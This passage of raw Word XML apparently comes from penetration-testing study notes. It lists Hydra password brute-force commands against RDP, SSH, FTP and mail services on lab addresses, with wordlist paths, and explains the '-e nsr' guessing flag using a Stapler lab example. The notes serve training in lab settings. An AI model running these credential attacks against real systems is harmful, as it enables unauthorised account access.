      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/seclists/Passwords/500-worst-passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012BE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012BF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012C0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_lzodnmqkh3oc" w:id="155"/>
      <w:bookmarkEnd w:id="155"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Other common Hydra services</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012C1">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RDPL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012C2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -L /usr/share/wordlists/dirb/others/names.txt -p "SuperS3cure1337#" -e </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nsr</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> rdp://192.168.50.202</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="527"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one is for</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> RDP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012C4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012C5">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -l michael -P /usr/share/wordlists/rockyou.txt -e </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nsr</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ssh://192.168.171.142</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="220"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one is for</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> SSH (SSH Bruteforce)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="220"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try this short wordlist first since it takes less time</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="220"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -l michael -P </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/seclists/Passwords/500-worst-passwords.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nsr</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ssh://192.168.171.142</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012CA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012CB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012CC">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FTP:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012CD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -l michael -P /usr/share/wordlists/rockyou.txt -e </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nsr</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ftp://192.168.237.148</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one is for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FTP,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and it includes a very interesting flag:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-e nsr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">additional checks</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> option. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-e </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">stands for "try empty password / username as password / reverse login."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The letters after it tell Hydra which extra guesses to include. Specifically:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">n</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → try null/empty password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012D3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">s</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → try login name as password (so: michael:michael)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">r </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ try reversed login name as password (so: michael:leahcim)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId359">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Stapler</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play, the "reverse" login name as password ended up being the way into FTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012D6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012D7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012D8">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mail (SMTP, POP3, IMAP):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012D9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1343"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -L users.txt -P pass.txt -e nsr smtp://target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1343"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -L users.txt -P pass.txt -e nsr pop3://target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1343"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -L users.txt -P pass.txt -e nsr imap://target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012DC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012DD">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Verbose:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012DE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="643"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-V</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the start for more verbose</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012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E0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5z8aqcxmhn1z" w:id="156"/>
      <w:bookmarkEnd w:id="156"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Wordlists</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012E1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012E2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is a reddit post about wordlists, which is an interesting topic since you don't want to miss an attack vector due to using wrong wordlist.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012E3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012E4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The OP of post made this cool looking tool called </w:t>
      </w:r>
      <w:hyperlink r:id="rId360">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ipcrawler</w:t>
        </w:r>
      </w:hyperlink>
